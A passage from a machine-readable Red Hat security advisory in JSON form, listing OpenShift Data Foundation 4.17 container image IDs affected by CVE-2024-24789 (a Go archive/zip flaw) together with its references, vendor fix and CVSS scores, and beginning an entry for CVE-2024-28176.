"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24789"
},
{
"category": "external",
"summary": "RHBZ#2292668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Incorrect handling of certain ZIP files"
},
{
"cve": "CVE-2024-28176",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
